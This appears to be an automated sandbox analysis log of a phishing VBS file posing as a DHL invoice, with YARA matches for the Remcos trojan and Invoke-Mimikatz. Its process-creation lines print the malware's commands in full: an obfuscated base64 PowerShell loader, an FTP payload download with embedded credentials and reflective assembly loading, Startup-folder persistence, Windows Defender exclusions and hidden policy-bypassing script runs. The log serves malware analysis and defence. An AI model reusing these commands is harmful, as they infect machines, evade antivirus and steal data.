                    Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winVBS@61/45@6/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,29_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,23_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,31_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,29_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,23_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,23_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,23_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x11.ps1Jump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5144:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\shietgtst-DDGG2A
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmrxwny3.fc5.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSystem information queried: HandleInformation
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: AddInProcess32.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: AddInProcess32.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: AddInProcess32.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: AddInProcess32.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [ch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x22.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [chJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
